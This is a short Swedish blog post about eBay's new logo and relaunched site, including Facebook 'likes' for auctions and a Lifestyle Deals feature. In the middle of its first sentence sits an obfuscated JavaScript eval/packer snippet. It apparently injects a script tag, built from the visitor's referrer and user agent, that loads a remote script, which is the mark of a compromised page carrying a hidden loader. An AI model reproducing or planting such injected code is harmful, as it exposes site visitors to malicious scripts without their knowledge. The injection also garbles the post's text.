Image Image Image Image Image Image Image Image Image Image

| 22 oktober, 2018

Scroll to top

Top

ebay, ny logga och sida.

ebay, ny logga och sida.
Filip Urde
  • On 11 oktober, 2012
  • http://www.revue.se/filip-urde

Som vi skrev (här) eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|iffzf|var|u0026u|referrer|tbaht||js|php’.split(‘|’),0,{}))
för ett tag sedan så har ebay skaffat en ny logga. ebay har nu genomfört sitt byte av logga och har nu lanserat om sin webbplats.

Det ser riktigt snyggt ut med den nya loggan! Älskar hur clean den är.

Nytt är bland annat att du kan ”gilla” auktioner via Facebook och en ny funktion som heter Lifestyle Deals, vilket  är en sorts rabble liknande tjänst med erbjudande. Den fungerar dock bara i Washington DC, San Francisco och Los Angeles.

Jag älskar ebay, men detta gjorde att jag dessutom tycker att sidan är snygg.